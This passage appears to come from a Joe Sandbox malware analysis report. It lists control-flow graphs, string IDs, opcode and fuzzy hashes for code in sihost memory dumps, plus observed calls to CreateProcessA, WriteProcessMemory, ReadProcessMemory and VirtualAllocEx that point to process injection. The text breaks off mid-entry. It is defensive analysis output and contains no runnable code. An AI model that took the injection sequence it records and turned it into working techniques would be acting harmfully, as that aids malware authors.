                                      control_flow_graph 219 452acd-452ad9 220 452abb 219->220 221 452adb-452adf 219->221 226 452a94-452aac 220->226 227 452a8d 220->227 223 452ae1-452aea 221->223 224 452b02 221->224 228 452af1-452afe 223->228 229 452aec-452aef 223->229 225 452b05 224->225 237 452b0b 225->237 247 452e36 226->247 269 452ab2-452ab6 226->269 227->221 227->226 230 452d65-452da1 227->230 231 452b86-452b8a 227->231 232 452d02-452d0a 227->232 233 452c8c-452c9f 227->233 234 452d0f-452d22 227->234 235 452d49-452d50 227->235 236 452b28-452b37 227->236 227->237 238 452e2a-452e33 227->238 239 452dd6-452e00 227->239 240 452e13-452e27 227->240 241 452c3d-452c41 227->241 242 452b00 228->242 229->242 306 452da3-452da9 230->306 307 452db9-452dc3 230->307 243 452bad 231->243 244 452b8c-452b95 231->244 246 452b13-452b16 232->246 233->247 274 452ca5-452cba 233->274 270 452d45-452d47 234->270 271 452d24-452d2e 234->271 235->247 248 452d56-452d60 235->248 275 452b4f-452b5b 236->275 276 452b39-452b3f 236->276 237->246 302 452e02 239->302 303 452e0c-452e11 239->303 250 452c64 241->250 251 452c43-452c4c 241->251 242->225 252 452bb0-452bb4 243->252 253 452b97-452b9a 244->253 254 452b9c-452ba9 244->254 246->236 262 452b18 246->262 247->247 248->246 258 452c67-452c87 250->258 260 452c53-452c60 251->260 261 452c4e-452c51 251->261 267 452bd7 252->267 268 452bb6-452bbf 252->268 266 452bab 253->266 254->266 258->246 273 452c62 260->273 261->273 262->230 262->231 262->232 262->233 262->234 262->235 262->236 262->238 262->239 262->240 262->241 266->252 278 452bda-452bde 267->278 279 452bc6-452bd3 268->279 280 452bc1-452bc4 268->280 269->220 270->235 287 452d40 270->287 271->247 282 452d34-452d3b 271->282 273->258 300 452cbc-452cc2 274->300 301 452cd8 274->301 293 452b66-452b74 275->293 285 452b41 276->285 286 452b43-452b45 276->286 290 452be0-452be9 278->290 291 452bff 278->291 289 452bd5 279->289 280->289 282->287 285->275 286->275 287->246 289->278 297 452bf0-452bf3 290->297 298 452beb-452bee 290->298 296 452c02-452c26 291->296 293->231 296->247 323 452c2c-452c38 296->323 304 452bfd 297->304 298->304 309 452cc4-452cc6 300->309 310 452cc8-452cd4 300->310 308 452cda-452cdc 301->308 314 452e07 302->314 303->240 303->314 304->296 315 452dad-452daf 306->315 316 452dab 306->316 307->247 317 452dc5-452dd1 307->317 312 452cde-452ce4 308->312 313 452cea-452cfd 308->313 311 452cd6 309->311 310->311 311->308 318 452ce6 312->318 319 452ce8 312->319 313->246 314->246 315->307 316->307 317->246 318->313 319->313 323->246
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.455694364.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_450000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: fp$ fp$Tep$XXp$XXp$XXp$$p$$p$$p$$p
                                      • API String ID: 0-355809937
                                      • Opcode ID: 798d57ef616ba2d6587f517092203c652c4bd51255e9ec3fb03318e4edf0323c
                                      • Instruction ID: f123b40774c874ad7581917a11a3103a767f341d05f820caba68bc6acab1b65d
                                      • Opcode Fuzzy Hash: 798d57ef616ba2d6587f517092203c652c4bd51255e9ec3fb03318e4edf0323c
                                      • Instruction Fuzzy Hash: FD818430A04254DFCB258F54D645ABEB7B1BF82302F298157EC015B397DBB8AC4ADB49

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 324 452b27 325 452b28-452b37 324->325 327 452b4f-452b5b 325->327 328 452b39-452b3f 325->328 331 452b66-452b74 327->331 329 452b41 328->329 330 452b43-452b45 328->330 329->327 330->327 332 452b86-452b8a 331->332 333 452bad 332->333 334 452b8c-452b95 332->334 335 452bb0-452bb4 333->335 336 452b97-452b9a 334->336 337 452b9c-452ba9 334->337 339 452bd7 335->339 340 452bb6-452bbf 335->340 338 452bab 336->338 337->338 338->335 342 452bda-452bde 339->342 343 452bc6-452bd3 340->343 344 452bc1-452bc4 340->344 346 452be0-452be9 342->346 347 452bff 342->347 345 452bd5 343->345 344->345 345->342 350 452bf0-452bf3 346->350 351 452beb-452bee 346->351 349 452c02-452c26 347->349 355 452e36 349->355 356 452c2c-452c38 349->356 352 452bfd 350->352 351->352 352->349 355->355 357 452b13-452b16 356->357 357->325 358 452b18 357->358 358->325 358->332 359 452d65-452da1 358->359 360 452dd6-452e00 358->360 361 452e13-452e27 358->361 362 452d02-452d0a 358->362 363 452c3d-452c41 358->363 364 452c8c-452c9f 358->364 365 452d0f-452d22 358->365 366 452d49-452d50 358->366 367 452e2a-452e33 358->367 397 452da3-452da9 359->397 398 452db9-452dc3 359->398 395 452e02 360->395 396 452e0c-452e11 360->396 362->357 368 452c64 363->368 369 452c43-452c4c 363->369 364->355 381 452ca5-452cba 364->381 382 452d45-452d47 365->382 383 452d24-452d2e 365->383 366->355 370 452d56-452d60 366->370 377 452c67-452c87 368->377 372 452c53-452c60 369->372 373 452c4e-452c51 369->373 370->357 380 452c62 372->380 373->380 377->357 380->377 393 452cbc-452cc2 381->393 394 452cd8 381->394 382->366 388 452d40 382->388 383->355 387 452d34-452d3b 383->387 387->388 388->357 400 452cc4-452cc6 393->400 401 452cc8-452cd4 393->401 399 452cda-452cdc 394->399 405 452e07 395->405 396->361 396->405 406 452dad-452daf 397->406 407 452dab 397->407 398->355 408 452dc5-452dd1 398->408 403 452cde-452ce4 399->403 404 452cea-452cfd 399->404 402 452cd6 400->402 401->402 402->399 409 452ce6 403->409 410 452ce8 403->410 404->357 405->357 406->398 407->398 408->357 409->404 410->404
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.455694364.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_450000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: fp$ fp$Tep$XXp$$p$$p$$p$$p
                                      • API String ID: 0-3004817860
                                      • Opcode ID: 43fd73ef3935f715523a63ed5b1f478240c35101c3ff0b1d72061e7dd392bb7d
                                      • Instruction ID: ed7fb13fb9da52fd2c979a02d7e5a5321e937aacce430411826ce102869847b5
                                      • Opcode Fuzzy Hash: 43fd73ef3935f715523a63ed5b1f478240c35101c3ff0b1d72061e7dd392bb7d
                                      • Instruction Fuzzy Hash: DF71B430E04214DFCB258F54D645BAEB7B1BB82302F698157D8016B397DBF8AC4ADB49

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 413 452b0e 414 452b13-452b16 413->414 415 452b28-452b37 414->415 416 452b18 414->416 443 452b4f-452b5b 415->443 444 452b39-452b3f 415->444 416->415 417 452d65-452da1 416->417 418 452b86-452b8a 416->418 419 452dd6-452e00 416->419 420 452e13-452e27 416->420 421 452d02-452d0a 416->421 422 452c3d-452c41 416->422 423 452c8c-452c9f 416->423 424 452d0f-452d22 416->424 425 452d49-452d50 416->425 426 452e2a-452e33 416->426 484 452da3-452da9 417->484 485 452db9-452dc3 417->485 427 452bad 418->427 428 452b8c-452b95 418->428 480 452e02 419->480 481 452e0c-452e11 419->481 421->414 429 452c64 422->429 430 452c43-452c4c 422->430 432 452e36 423->432 454 452ca5-452cba 423->454 450 452d45-452d47 424->450 451 452d24-452d2e 424->451 425->432 433 452d56-452d60 425->433 435 452bb0-452bb4 427->435 436 452b97-452b9a 428->436 437 452b9c-452ba9 428->437 445 452c67-452c87 429->445 438 452c53-452c60 430->438 439 452c4e-452c51 430->439 432->432 433->414 448 452bd7 435->448 449 452bb6-452bbf 435->449 447 452bab 436->447 437->447 453 452c62 438->453 439->453 466 452b66-452b74 443->466 455 452b41 444->455 456 452b43-452b45 444->456 445->414 447->435 458 452bda-452bde 448->458 459 452bc6-452bd3 449->459 460 452bc1-452bc4 449->460 450->425 465 452d40 450->465 451->432 462 452d34-452d3b 451->462 453->445 478 452cbc-452cc2 454->478 479 452cd8 454->479 455->443 456->443 469 452be0-452be9 458->469 470 452bff 458->470 468 452bd5 459->468 460->468 462->465 465->414 466->418 468->458 475 452bf0-452bf3 469->475 476 452beb-452bee 469->476 474 452c02-452c26 470->474 474->432 501 452c2c-452c38 474->501 482 452bfd 475->482 476->482 487 452cc4-452cc6 478->487 488 452cc8-452cd4 478->488 486 452cda-452cdc 479->486 492 452e07 480->492 481->420 481->492 482->474 493 452dad-452daf 484->493 494 452dab 484->494 485->432 495 452dc5-452dd1 485->495 490 452cde-452ce4 486->490 491 452cea-452cfd 486->491 489 452cd6 487->489 488->489 489->486 496 452ce6 490->496 497 452ce8 490->497 491->414 492->414 493->485 494->485 495->414 496->491 497->491 501->414
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.455694364.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_450000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: fp$ fp$Tep$XXp$$p$$p$$p$$p
                                      • API String ID: 0-3004817860
                                      • Opcode ID: 46da8c45c51f1703fa96b19b1a1f02a55a32f5b0f855c9e344e9bde2dcdd9a7e
                                      • Instruction ID: 334e57ca1e3a065878c3f6151b76218cd460c6d8ef28a2a5ed6037f4fd43bdf9
                                      • Opcode Fuzzy Hash: 46da8c45c51f1703fa96b19b1a1f02a55a32f5b0f855c9e344e9bde2dcdd9a7e
                                      • Instruction Fuzzy Hash: 40719530E04214DFDB258F54D645BAEB7B1BB82302F298157E8015B397DBF8AC4ADB49

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 502 455171-4551bc 508 4551d4-455220 502->508 509 4551be-4551c4 502->509 517 455222-455228 508->517 518 455238-455247 508->518 510 4551c6 509->510 511 4551c8-4551ca 509->511 510->508 511->508 521 45522c-45522e 517->521 522 45522a 517->522 519 455161-455164 518->519 520 45524d-45524f 518->520 523 45535d-455390 call 450e54 519->523 524 45516a 519->524 520->519 525 455254 520->525 521->518 522->518 575 455371 523->575 576 455392 523->576 524->523 524->525 526 4554c5-4554d2 524->526 527 455394-455410 524->527 528 4554d7-4554da 524->528 529 455517-455520 524->529 530 4553d0-45540a 524->530 531 45528c-4552ff 524->531 532 4553bc-4553ce 524->532 533 4554b9 524->533 534 45530a-455311 524->534 535 45543a-455453 524->535 536 45525d 525->536 526->519 557 455412-45541b 527->557 558 45541f-455421 527->558 586 4554dd call 510d78 528->586 587 4554dd call 510d88 528->587 555 455522 529->555 562 4553b0-4553b3 530->562 579 45540c 530->579 531->519 583 455305 531->583 532->530 551 455423-45542f 532->551 533->526 545 455455-455469 535->545 546 45546d 535->546 588 45525f call 511648 536->588 589 45525f call 511638 536->589 543 4554e3-4554f5 584 4554f7 call 510fb9 543->584 585 4554f7 call 510fc8 543->585 568 455457 545->568 569 45546b 545->569 546->533 549 455265-455271 549->519 556 455277 549->556 561 455435 551->561 551->562 555->555 556->531 557->562 566 45541d 557->566 558->530 558->551 561->535 563 4553ad 561->563 562->532 567 4553b5 562->567 563->562 566->563 567->527 567->530 567->532 567->533 567->535 568->546 569->568 573 4554fd-45550c 573->519 574 455512 573->574 574->529 575->527 576->575 579->563 583->534 584->573 585->573 586->543 587->543 588->549 589->549
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.455694364.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_450000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Tep$pTE$$p$$p$$p$$p
                                      • API String ID: 0-2300086681
                                      • Opcode ID: f571d1de5daeb5b918b2b49361bce4a2ac21418f6e0e751e174b82724a6432d2
                                      • Instruction ID: bfa98ce61e4d01db8eef2be45d0b15fc76dd1af9726a15a4f6b5021090623478
                                      • Opcode Fuzzy Hash: f571d1de5daeb5b918b2b49361bce4a2ac21418f6e0e751e174b82724a6432d2
                                      • Instruction Fuzzy Hash: C7818634B00604DFD7149F64D865B7E7BA2EB89342F24447AE806DB3A6DE74CC45CB49

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 703 455138-455159 704 455161-455164 703->704 705 45527c-45531e 703->705 706 45535d-455390 call 450e54 704->706 707 45516a 704->707 779 455320 call 455681 705->779 780 455320 call 455581 705->780 781 455320 call 455560 705->781 762 455371 706->762 763 455392 706->763 707->706 709 4554c5-4554d2 707->709 710 455254-45525d 707->710 711 455394-455410 707->711 712 4554d7-4554da 707->712 713 455517-455520 707->713 714 4553d0-45540a 707->714 715 45528c-4552ff 707->715 716 4553bc-4553ce 707->716 717 4554b9 707->717 718 45530a-455311 707->718 719 45543a-455453 707->719 709->704 784 45525f call 511648 710->784 785 45525f call 511638 710->785 742 455412-45541b 711->742 743 45541f-455421 711->743 777 4554dd call 510d78 712->777 778 4554dd call 510d88 712->778 741 455522 713->741 747 4553b0-4553b3 714->747 768 45540c 714->768 715->704 776 455305 715->776 716->714 735 455423-45542f 716->735 717->709 730 455455-455469 719->730 731 45546d 719->731 728 4554e3-4554f5 782 4554f7 call 510fb9 728->782 783 4554f7 call 510fc8 728->783 755 455457 730->755 756 45546b 730->756 731->717 746 455435 735->746 735->747 740 455265-455271 740->704 750 455277 740->750 741->741 742->747 754 45541d 742->754 743->714 743->735 746->719 752 4553ad 746->752 747->716 751 4553b5 747->751 750->715 751->711 751->714 751->716 751->717 751->719 752->747 753 455326-455352 call 450e64 call 454b54 753->704 774 455358 753->774 754->752 755->731 756->755 761 4554fd-45550c 761->704 764 455512 761->764 762->711 763->762 764->713 768->752 774->774 776->718 777->728 778->728 779->753 780->753 781->753 782->761 783->761 784->740 785->740
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.455694364.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_450000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Tep$Tep$pTE
                                      • API String ID: 0-2975379879
                                      • Opcode ID: 196f57c98842d7ab4a5e17b855d55488a9f047c07e42b0897e5ba8361292a98a
                                      • Instruction ID: f21425908b809b20970d28416facb07d92bd9f47c7fcbe83ad4f898169b9f66a
                                      • Opcode Fuzzy Hash: 196f57c98842d7ab4a5e17b855d55488a9f047c07e42b0897e5ba8361292a98a
                                      • Instruction Fuzzy Hash: 11717434B10604CFDB149B64D86877D7BB2EB89342F24446AEC07D73A6DE788C49CB49

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 786 4508f0-450919 787 450921-450924 786->787 788 450926 787->788 789 45092d-450934 787->789 788->789 790 450a95-450a9b 788->790 791 450a75-450a89 788->791 792 4509f4-4509f8 788->792 793 450976-45097d 788->793 794 450a71-450a73 788->794 795 450950-450965 788->795 796 4509c0 788->796 797 4509b9 788->797 798 450a0b-450a1e 788->798 789->790 799 45093a-450941 789->799 803 450a9c-450aa6 791->803 820 450a8b-450a93 791->820 804 450a20 792->804 805 4509fa-450a06 792->805 806 4509a5-4509a9 793->806 807 45097f-450986 793->807 801 450a5c-450a5f 794->801 815 45096a-45096d 795->815 812 4509ca-4509ee 796->812 797->796 800 450a25-450a29 798->800 802 450947-45094e 799->802 799->803 808 450a4c 800->808 809 450a2b-450a34 800->809 801->794 814 450a61 801->814 802->787 804->800 805->815 806->804 811 4509ab-4509b7 806->811 807->804 816 45098c-450997 807->816 823 450a4f-450a54 808->823 818 450a36-450a39 809->818 819 450a3b-450a48 809->819 821 4509a3 811->821 812->792 814->790 814->791 814->794 815->793 824 45096f 815->824 816->804 817 45099d-4509a1 816->817 817->821 825 450a4a 818->825 819->825 820->801 821->815 823->801 824->790 824->791 824->792 824->793 824->794 824->796 824->797 824->798 825->823
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.455694364.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_450000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ,?$X^,${
                                      • API String ID: 0-1400551744
                                      • Opcode ID: 05da1e591b6d5e27b688cf558f1c9c9cba78fb42df05d1efdeefd2c5b3934cf6
                                      • Instruction ID: 5085df43370fe74a3519d31878de942d50494f5d99cd55bcc945e475ec4816a7
                                      • Opcode Fuzzy Hash: 05da1e591b6d5e27b688cf558f1c9c9cba78fb42df05d1efdeefd2c5b3934cf6
                                      • Instruction Fuzzy Hash: 5E412578A04355CFC705CF68C4106AEBBB2AF96312F1485A7C846AB397C738DC48CB99

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 952 455478-455490 call 455581 956 455492 952->956 957 4554b9 952->957 958 4554a3-4554b5 956->958 959 4554c5-4554d2 957->959 961 455497-45549a 958->961 962 4554b7 958->962 966 455161-455164 959->966 961->957 964 45549c 961->964 962->957 965 455494 962->965 964->958 964->959 967 45535d-455390 call 450e54 964->967 969 455394-455410 964->969 970 455254 964->970 971 455517-455520 964->971 972 4554d7-4554da 964->972 973 4553d0-45540a 964->973 974 4553bc-4553ce 964->974 975 45528c-4552ff 964->975 976 45543a-455453 964->976 977 45530a-455311 964->977 965->961 966->967 968 45516a 966->968 1017 455371 967->1017 1018 455392 967->1018 968->957 968->959 968->967 968->969 968->970 968->971 968->972 968->973 968->974 968->975 968->976 968->977 996 455412-45541b 969->996 997 45541f-455421 969->997 979 45525d 970->979 995 455522 971->995 1027 4554dd call 510d78 972->1027 1028 4554dd call 510d88 972->1028 1001 4553b0-4553b3 973->1001 1020 45540c 973->1020 974->973 991 455423-45542f 974->991 975->966 1024 455305 975->1024 986 455455-455469 976->986 987 45546d 976->987 1029 45525f call 511648 979->1029 1030 45525f call 511638 979->1030 983 4554e3-4554f5 1025 4554f7 call 510fb9 983->1025 1026 4554f7 call 510fc8 983->1026 1009 455457 986->1009 1010 45546b 986->1010 987->957 1000 455435 991->1000 991->1001 994 455265-455271 994->966 1005 455277 994->1005 995->995 996->1001 1006 45541d 996->1006 997->973 997->991 1000->976 1003 4553ad 1000->1003 1001->974 1007 4553b5 1001->1007 1003->1001 1005->975 1006->1003 1007->957 1007->969 1007->973 1007->974 1007->976 1009->987 1010->1009 1013 4554fd-45550c 1013->966 1014 455512 1013->1014 1014->971 1017->969 1018->1017 1020->1003 1024->977 1025->1013 1026->1013 1027->983 1028->983 1029->994 1030->994
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.455694364.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_450000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Tep$pTE
                                      • API String ID: 0-889855801
                                      • Opcode ID: c68d412b6fc566d839e1c6db63654508ee97c03ccd3413e52709fd7274e3e214
                                      • Instruction ID: a07c64230b7ec4b2bf2d9519aceb5a29e623cb49f70c271ca9438a8ce1837c67
                                      • Opcode Fuzzy Hash: c68d412b6fc566d839e1c6db63654508ee97c03ccd3413e52709fd7274e3e214
                                      • Instruction Fuzzy Hash: FA616234B10604DFDB149F64D868B7D77B1EB49343F24446AE806D73A6DA788C8ACF4A

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1031 45515e 1032 455161-455164 1031->1032 1033 45535d-455390 call 450e54 1032->1033 1034 45516a 1032->1034 1085 455371 1033->1085 1086 455392 1033->1086 1034->1033 1035 4554c5-4554d2 1034->1035 1036 455254 1034->1036 1037 455394-455410 1034->1037 1038 4554d7-4554da 1034->1038 1039 455517-455520 1034->1039 1040 4553d0-45540a 1034->1040 1041 45528c-4552ff 1034->1041 1042 4553bc-4553ce 1034->1042 1043 4554b9 1034->1043 1044 45530a-455311 1034->1044 1045 45543a-455453 1034->1045 1035->1032 1048 45525d 1036->1048 1066 455412-45541b 1037->1066 1067 45541f-455421 1037->1067 1096 4554dd call 510d78 1038->1096 1097 4554dd call 510d88 1038->1097 1065 455522 1039->1065 1071 4553b0-4553b3 1040->1071 1089 45540c 1040->1089 1041->1032 1093 455305 1041->1093 1042->1040 1060 455423-45542f 1042->1060 1043->1035 1055 455455-455469 1045->1055 1056 45546d 1045->1056 1098 45525f call 511648 1048->1098 1099 45525f call 511638 1048->1099 1053 4554e3-4554f5 1094 4554f7 call 510fb9 1053->1094 1095 4554f7 call 510fc8 1053->1095 1078 455457 1055->1078 1079 45546b 1055->1079 1056->1043 1070 455435 1060->1070 1060->1071 1064 455265-455271 1064->1032 1075 455277 1064->1075 1065->1065 1066->1071 1076 45541d 1066->1076 1067->1040 1067->1060 1070->1045 1072 4553ad 1070->1072 1071->1042 1077 4553b5 1071->1077 1072->1071 1075->1041 1076->1072 1077->1037 1077->1040 1077->1042 1077->1043 1077->1045 1078->1056 1079->1078 1083 4554fd-45550c 1083->1032 1084 455512 1083->1084 1084->1039 1085->1037 1086->1085 1089->1072 1093->1044 1094->1083 1095->1083 1096->1053 1097->1053 1098->1064 1099->1064
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.455694364.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_450000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Tep$pTE
                                      • API String ID: 0-889855801
                                      • Opcode ID: 63694f0670a02c4a882f625ea6ed5e2171f1dafc656292f78b4c6b5df76f45b5
                                      • Instruction ID: 398d9ee693e79140b5c0a40b39f12551897fced2bc3f5d2073318432df9c636e
                                      • Opcode Fuzzy Hash: 63694f0670a02c4a882f625ea6ed5e2171f1dafc656292f78b4c6b5df76f45b5
                                      • Instruction Fuzzy Hash: 97515134B10604CFDB149F64D868B7D7BB2EB89342F24446AE806D73A6DA789C49CF49

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1100 4554c4 1101 4554c5-4554d2 1100->1101 1103 455161-455164 1101->1103 1104 45535d-455390 call 450e54 1103->1104 1105 45516a 1103->1105 1154 455371 1104->1154 1155 455392 1104->1155 1105->1101 1105->1104 1106 455254-45525d 1105->1106 1107 455394-455410 1105->1107 1108 4554d7-4554da 1105->1108 1109 455517-455520 1105->1109 1110 4553d0-45540a 1105->1110 1111 45528c-4552ff 1105->1111 1112 4553bc-4553ce 1105->1112 1113 4554b9 1105->1113 1114 45530a-455311 1105->1114 1115 45543a-455453 1105->1115 1167 45525f call 511648 1106->1167 1168 45525f call 511638 1106->1168 1135 455412-45541b 1107->1135 1136 45541f-455421 1107->1136 1165 4554dd call 510d78 1108->1165 1166 4554dd call 510d88 1108->1166 1134 455522 1109->1134 1140 4553b0-4553b3 1110->1140 1158 45540c 1110->1158 1111->1103 1162 455305 1111->1162 1112->1110 1129 455423-45542f 1112->1129 1113->1101 1124 455455-455469 1115->1124 1125 45546d 1115->1125 1122 4554e3-4554f5 1163 4554f7 call 510fb9 1122->1163 1164 4554f7 call 510fc8 1122->1164 1147 455457 1124->1147 1148 45546b 1124->1148 1125->1113 1139 455435 1129->1139 1129->1140 1133 455265-455271 1133->1103 1144 455277 1133->1144 1134->1134 1135->1140 1145 45541d 1135->1145 1136->1110 1136->1129 1139->1115 1141 4553ad 1139->1141 1140->1112 1146 4553b5 1140->1146 1141->1140 1144->1111 1145->1141 1146->1107 1146->1110 1146->1112 1146->1113 1146->1115 1147->1125 1148->1147 1152 4554fd-45550c 1152->1103 1153 455512 1152->1153 1153->1109 1154->1107 1155->1154 1158->1141 1162->1114 1163->1152 1164->1152 1165->1122 1166->1122 1167->1133 1168->1133
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.455694364.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_450000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Tep$pTE
                                      • API String ID: 0-889855801
                                      • Opcode ID: 20668acab635438c69a14828ad8dc211db9b0fb3a43fdd6d3f86bc5a14ee8158
                                      • Instruction ID: cda1c08199a3d612eadd460ae2aec4098c54a6db1140691a2f3f1216d30547b6
                                      • Opcode Fuzzy Hash: 20668acab635438c69a14828ad8dc211db9b0fb3a43fdd6d3f86bc5a14ee8158
                                      • Instruction Fuzzy Hash: B4515134B10604CFDB149F64D868B7D7BB2EB89343F24446AE806D73A6DA789C49CF49
                                      APIs
                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00519ADF
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.456253898.0000000000510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00510000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_510000_sihost.jbxd
                                      Similarity
                                      • API ID: CreateProcess
                                      • String ID:
                                      • API String ID: 963392458-0
                                      • Opcode ID: e6ca434dd9e77d2302d0ac6a99386ec633d1e21cb4aced00a2ad97ef0c1c44d2
                                      • Instruction ID: 159676e0ec01f37729506eeda792d907275833e4fe35451fffde459d378ba153
                                      • Opcode Fuzzy Hash: e6ca434dd9e77d2302d0ac6a99386ec633d1e21cb4aced00a2ad97ef0c1c44d2
                                      • Instruction Fuzzy Hash: 1EC12470D002598FEF24CFA8C851BEEBBB1BF49304F0091AAD859B7250DB749A85CF95
                                      APIs
                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00519ADF
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.456253898.0000000000510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00510000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_510000_sihost.jbxd
                                      Similarity
                                      • API ID: CreateProcess
                                      • String ID:
                                      • API String ID: 963392458-0
                                      • Opcode ID: 74acdcda40d003335890e9fded6cb746437e174adcd58552cc7c2128ebe3e91f
                                      • Instruction ID: 95c6b27ea6a73ad1a2838d727e84b054a96f99a49980a81377a8a7750befffaa
                                      • Opcode Fuzzy Hash: 74acdcda40d003335890e9fded6cb746437e174adcd58552cc7c2128ebe3e91f
                                      • Instruction Fuzzy Hash: CDC11370D002598FEF24CFA8C851BEEBBB1BF49304F0091AAD859B7250DB749A85CF95
                                      APIs
                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00519553
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.456253898.0000000000510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00510000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_510000_sihost.jbxd
                                      Similarity
                                      • API ID: MemoryProcessWrite
                                      • String ID:
                                      • API String ID: 3559483778-0
                                      • Opcode ID: 0a12730238a9ee0346a9d647b5a1721ad70f73b184e5fade9853a92b7c0c759f
                                      • Instruction ID: 8ab2920df896b129cbfabc76b007861591f047c633f2d96a55da2efe816124b1
                                      • Opcode Fuzzy Hash: 0a12730238a9ee0346a9d647b5a1721ad70f73b184e5fade9853a92b7c0c759f
                                      • Instruction Fuzzy Hash: 8341AAB4D002489FCF00CFA9D984AEEFBF1BF49314F24942AE815B7250D735AA45CB64
                                      APIs
                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00519692
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.456253898.0000000000510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00510000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_510000_sihost.jbxd
                                      Similarity
                                      • API ID: MemoryProcessRead
                                      • String ID:
                                      • API String ID: 1726664587-0
                                      • Opcode ID: 4a8cdff7e68a2ac7542e3af6f5f715851cfeb669746954c1f0d0889478399c3f
                                      • Instruction ID: b7be27526a4695ec358651b8e00e0ae797dee7f13430b6d75feb357403e72651
                                      • Opcode Fuzzy Hash: 4a8cdff7e68a2ac7542e3af6f5f715851cfeb669746954c1f0d0889478399c3f
                                      • Instruction Fuzzy Hash: 1741BAB5D002589FCF10CFA9D984AEEFBB1BF49310F20942AE814B7250D775A945CF65
                                      APIs
                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00519692
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.456253898.0000000000510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00510000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_510000_sihost.jbxd
                                      Similarity
                                      • API ID: MemoryProcessRead
                                      • String ID:
                                      • API String ID: 1726664587-0
                                      • Opcode ID: 1e84e98b511ecc5a0f980a8bb49f7c96af9d945550d027e2886a59de2bed5fba
                                      • Instruction ID: d70d7d3acf450b2690687f8b3a6e4f81246d176c550dcd5ea350af102d19a29d
                                      • Opcode Fuzzy Hash: 1e84e98b511ecc5a0f980a8bb49f7c96af9d945550d027e2886a59de2bed5fba
                                      • Instruction Fuzzy Hash: C141A9B5D002589FCF10CFAAD984AEEFBB1BF49310F20942AE815B7240D735A955CF69
                                      APIs
                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00519402
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.456253898.0000000000510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00510000, based on PE: false
                                      Joe Sandbox IDA Plugin
